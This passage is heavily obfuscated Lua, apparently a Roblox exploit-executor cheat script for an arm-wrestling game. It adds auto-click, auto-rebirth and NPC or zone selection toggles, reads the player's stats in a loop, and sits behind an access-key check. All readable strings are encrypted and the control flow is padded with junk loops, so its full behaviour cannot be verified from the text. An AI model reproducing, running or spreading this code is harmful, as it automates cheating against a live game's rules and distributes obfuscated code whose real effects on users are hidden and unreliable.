end});v52:AddToggle(v7("\228\58\236\166\219\113\2\198\36","\107\165\79\152\201\152\29"),{[v7("\99\75\240\223","\31\55\46\136\171\52")]=v7("\240\61\200\251\145\11\208\253\210\35","\148\177\72\188"),[v7("\130\179\81\210\179\186\67","\179\198\214\55")]=false,[v7("\196\3\125\122\81\218\224","\179\144\108\18\22\37")]=v7("\227\173\26\139\195\195\227\58\156\219\201\227\56\133\198\197\168\91","\175\166\195\123\233"),[v7("\204\195\81\69\242\238\193\86","\144\143\162\61\41")]=function(v159) getgenv().AutoClick=v159;end});v52:AddToggle(v7("\193\198\9\95\83\149\62\215\193\24\67\102\139\54","\83\128\179\125\48\18\231"),{[v7("\105\178\235\201","\126\61\215\147\189\39")]=v7("\89\234\9\74\56\222\15\72\56\200\15\64\107\235\17\64","\37\24\159\125"),[v7("\254\163\115\67\207\170\97","\34\186\198\21")]=false,[v7("\204\7\202\81\214\241\24","\162\152\104\165\61")]=v7("\232\33\179\127\124\224\141\14\167\105\127\165\236\61\191\61\71\247\200\60\166\113\117\165","\133\173\79\210\29\16"),[v7("\174\125\225\39\143\125\238\32","\75\237\28\141")]=function(v161) local v162=0;local v163;while true do if ((0 + 0)==v162) then v163=1212 -(615 + 597) ;while true do if (v163==0) then getgenv().AutoAW=v161;warn(v7("\231\118\251\241\28\14\247\241\211\77\216\180\61\38\167\210\217\83\201\178\59\30\227\161\134","\129\188\63\172\209\79\123\135"),v161);break;end end break;end end end});v52:AddToggle(v7("\97\241\242\194\114\225\228\196\82\240\238","\173\32\132\134"),{[v7("\122\30\16\251","\173\46\123\104\143\206\81")]=v7("\149\8\54\133\5\177\4\182\20\48\158\77","\97\212\125\66\234\37\227"),[v7("\174\230\176\52\11\134\247","\126\234\131\214\85")]=false,[v7("\176\218\70\86\91\141\197","\47\228\181\41\58")]=v7("\131\242\216\57\15\53\95\135\233\205\52\67\2\26\164\245\203\47\11\112","\127\198\156\185\91\99\80"),[v7("\214\27\192\252\165\10\58\213","\190\149\122\172\144\199\107\89")]=function(v164) local v165=0;local v166;while true do if (v165==(0 + 0)) then v166=0;while true do if (v166==(0 -0)) then getgenv().AutoRebirth=v164;warn(v7("\9\44\198\190\205\39\21\225\241\236\38\0\227\195\190\1\0\253\251\253\38\0\245\190\164","\158\82\101\145\158"),v164);break;end end break;end end end});v52:AddToggle(v7("\81\235\22\25\119\101\238\7\4\118\117\252\11\4\80\120","\36\16\158\98\118"),{[v7("\244\19\219\239","\133\160\118\163\155\56\136\71")]=v7("\215\183\101\253\246\44\160\230\167\99\178\132\26\183\255\176\101\250","\213\150\194\17\146\214\127"),[v7("\63\172\162\213\83\168\182","\86\123\201\196\180\38\196\194")]=false,[v7("\195\231\214\163\227\225\201","\207\151\136\185")]=v7("\141\141\41\128\120\125\49\137\150\60\141\52\75\100\184\134\58\194\70\125\115\161\145\60\138\52","\17\200\227\72\226\20\24"),[v7("\147\64\23\219\203\240\236\244","\159\208\33\123\183\169\145\143")]=function(v167) local v168=0 + 0 ;local v169;while true do if (v168==(0 + 0)) then v169=0;while true do if (v169==(0 + 0)) then getgenv().AutoSuperRebirth=v167;warn(v7("\201\115\15\118\193\79\40\38\253\72\44\51\224\103\120\5\247\86\61\53\230\95\60\118\168","\86\146\58\88"),v167);break;end end break;end end end});v58=v54:AddLabel(v7("\117\222\225\197\238\199\57\232\85\222\230\128\157\236\58\255\91\203\227\207\160\169","\154\56\191\138\160\206\137\86"),true);v12=1911 -(1056 + 843) ;end if (v12==12) then local v79=0;while true do if (v79==(5 -2)) then tools={};tool=game:GetService(v7("\40\141\155\220\19\139\138\196\31\140\184\196\21\154\138\215\31","\176\122\232\235")).Tools;v79=6 -2 ;end if (v79==(2 -1)) then for v260=1 + 0 ,9 do local v261=0;local v262;local v263;while true do if (v261==1) then for v341,v342 in ipairs(v263:GetChildren()) do table.insert(Npc,v342.Name);end break;end if (v261==0) then local v332=1976 -(286 + 1690) ;while true do if (v332==(912 -(98 + 813))) then v261=1 + 0 ;break;end if (v332==0) then v262=tostring(v260,v7("\84\233\153\68\158\186\217\123\236","\188\21\152\236\37\219\204"),v7("\101\232\36\24\69\251","\108\32\137\87"),v7("\130\253\14\178\24\246\89\85\174","\57\202\136\96\198\79\153\43"),v7("\140\49\175\162\134\130\238\174\45\190","\152\203\67\202\199\237\199"));v263=game:GetService(v7("\205\76\178\4\12\101\120\229\255","\134\154\35\192\111\127\21\25")).GameObjects.ArmWrestling[v262].NPC;v332=2 -1 ;end end end end end v54:AddDropdown(v7("\150\54\10\25","\178\216\70\105\106\64"),{[v7("\9\42\118\227\204\198","\224\95\75\26\150\169\181\180")]=Npc,[v7("\47\223\222\41\81\160\98","\22\107\186\184\72\36\204")]="",[v7("\202\168\40\90\7","\110\135\221\68\46")]=false,[v7("\215\51\20\255","\91\131\86\108\139\174\211")]=v7("\200\46\180\18\94\239\107\150\7\94","\61\155\75\216\119"),[v7("\48\164\189\48\76\0\205","\189\100\203\210\92\56\105")]=v7("\1\65\254\104\28\84\241\45\44\69\244\39\33\17","\72\79\49\157"),[v7("\171\177\61\176\138\177\50\183","\220\232\208\81")]=function(v264) local v265=0 + 0 ;while true do if ((507 -(263 + 244))==v265) then getgenv().Npc=v264;warn(v7("\206\151\210\112\31\79\177\229\177\247\36\41\72\156\181\141\224\60\41\89\181\240\186\165\106","\193\149\222\133\80\76\58"),v264);break;end end end});v79=2 + 0 ;end if (0==v79) then v54:AddDropdown(v7("\177\86\231\139\120\41","\172\230\57\149\231\28\90\225"),{[v7("\52\171\138\199\45\200","\187\98\202\230\178\72")]=Zones,[v7("\5\228\162\49\95\45\245","\42\65\129\196\80")]="",[v7("\47\95\81\206\30","\142\98\42\61\186\119\103\98")]=false,[v7("\12\186\26\28","\104\88\223\98")]=v7("\119\242\238\203\1\249\4\192\237\220\14\233","\141\36\151\130\174\98"),[v7("\176\117\205\1\144\115\210","\109\228\26\162")]=v7("\105\234\239\116\228\166\109\224\241\125\227\242\87\234\243\56","\134\62\133\157\24\128"),[v7("\36\164\22\213\45\176\213\12","\182\103\197\122\185\79\209")]=function(v266) local v267=0;while true do if (v267==(1687 -(1502 + 185))) then getgenv().World=v266;warn(v7("\200\174\214\55\51\93\227\151\238\101\20\77\225\186\161\68\5\68\246\132\245\114\4\8\169","\40\147\231\129\23\96"),v266);break;end end end});Npc={};v79=1 + 0 ;end if ((19 -15)==v79) then for v268,v269 in pairs(tool:GetChildren()) do table.insert(tools,v269.Name);end v12=34 -21 ;break;end if ((1529 -(629 + 898))==v79) then v54:AddDropdown(v7("\237\83\90\209\205\81\74\193","\178\166\61\47"),{[v7("\205\75\228\111\207\45","\94\155\42\136\26\170")]={v7("\176\54\35\167\213","\213\228\95\70"),v7("\30\178\199\150\37","\23\74\219\162\228"),v7("\13\239\67\189\104","\91\89\134\38\207"),v7("\112\231\205\36\71","\71\36\142\168\86\115\176"),v7("\235\168\119\173\86","\41\191\193\18\223\99\222\54"),v7("\159\47\194\56\252","\202\203\70\167\74"),v7("\26\40\236","\17\76\97\188\83")},[v7("\161\34\223\54\37\143\95","\195\229\71\185\87\80\227\43")]=v7("\214\245\16","\143\128\156\96\48"),[v7("\149\196\252\6\30","\119\216\177\144\114")]=false,[v7("\253\44\225\86","\34\169\73\153")]=v7("\153\233\7\142\169\248\75\187\191\226\8\131\136\237\12\152","\235\202\140\107"),[v7("\56\123\59\164\253\46\231","\165\108\20\84\200\137\71\151")]=v7("\74\161\37\139\114\150\42\143\105\244\24\141\118\177\40\156\115\187\37\200","\232\26\212\75"),[v7("\20\72\126\228\245\54\74\121","\151\87\41\18\136")]=function(v270) local v271=0;local v272;while true do if (v271==(1149 -(212 + 937))) then v272=0 + 0 ;while true do if (v272==(1062 -(111 + 951))) then getgenv().PunchBags=v270;warn(v7("\96\134\253\144\205\78\191\218\223\236\79\170\216\237\190\104\170\198\213\253\79\170\206\144\190\1","\158\59\207\170\176"),v270);break;end end break;end end end});spawn(function() while getgenv().World and task.wait(5)  do if (getgenv().World=="4") then Options.Knuckles.Values={v7("\123\87\54\91\221","\236\47\62\83\41"),v7("\206\160\37\41\248","\226\154\201\64\91\202"),v7("\245\64\24\10\25","\220\161\41\125\120\42"),v7("\136\120\165\28\232","\110\220\17\192"),v7("\66\80\4","\199\20\25\84\122\139\87\145")};Options.Knuckles:SetValues();elseif (getgenv().World~="4") then local v366=534 -(31 + 503) ;while true do if (v366==(1632 -(595 + 1037))) then Options.Knuckles.Values={v7("\115\0\216\188\74","\138\39\105\189\206\123"),v7("\43\14\140\63\161","\159\127\103\233\77\147\153\175"),v7("\51\249\225\184\19","\171\103\144\132\202\32"),v7("\36\38\236\30\68","\108\112\79\137"),v7("\11\203\113\58\248","\85\95\162\20\72\205\97\137"),v7("\195\244\47\206\91","\173\151\157\74\188\109\152"),v7("\18\33\8","\147\68\104\88\189\188\52\181")};Options.Knuckles:SetValues();break;end end end end end);v79=1820 -(348 + 1469) ;end end end if (v12==2) then b=require(game:GetService(v7("\10\11\146\202\163\59\15\150\195\174\11\26\141\212\171\63\11","\202\88\110\226\166")).Data.RebirthRanks);ranks={};for v170,v171 in pairs(b) do end getgenv().loaded=true;spawn(function() while task.wait() do local v179=0;local v180;while true do if (0==v179) then v180=1289 -(1115 + 174) ;while true do if (v180==0) then getgenv().ValuesUpdate={[v7("\232\1\151\244\193\207\10\145","\170\163\111\226\151")]=game:GetService(v7("\33\60\179\33\75\37\58","\73\113\80\210\88\46\87")).LocalPlayer.leaderstats.Knuckles.Value,[v7("\182\37\195\1","\135\225\76\173\114")]=game:GetService(v7("\42\225\185\169\169\175\180","\199\122\141\216\208\204\221")).LocalPlayer.leaderstats.Wins.Value,[v7("\133\220\30\244\107","\150\205\189\112\144\24")]=game:GetService(v7("\21\136\190\85\1\154\2","\112\69\228\223\44\100\232\113")).LocalPlayer.leaderstats.Hands.Value,[v7("\246\22\4\214\166\111","\230\180\127\103\179\214\28")]=game:GetService(v7("\188\9\94\95\225\83\243","\128\236\101\63\38\132\33")).LocalPlayer.leaderstats.Biceps.Value};task.wait(0.25 -0 );break;end end break;end end end end);Zones={};for v172,v173 in game:GetService(v7("\155\166\3\79\165\251\206\175\172","\175\204\201\113\36\214\139")).GameObjects.ArmWrestling:GetChildren() do if v173:IsA(v7("\97\195\57\216\1\85","\100\39\172\85\188")) then table.insert(Zones,v173.Name);end end v24={"K","M","B","T",v7("\156\121","\83\205\24\217\224"),v7("\215\204","\93\134\165\173"),v7("\141\234","\30\222\146\161\162\90\174\210"),v7("\214\94","\106\133\46\16"),v7("\119\35","\32\56\64\19\156\58"),v7("\116\199\235","\224\58\168\133\54\58\146")};v25=nil;v12=1707 -(95 + 1609) ;end end elseif (getgenv().Key~=v7("\238\232\50\156\136\253\46\143\244\224\47","\197\191\191\96")) then warn(v7("\227\39\238\65\74\250\72\201\61\173\101\93\241","\45\170\73\141\46\56\136"));end
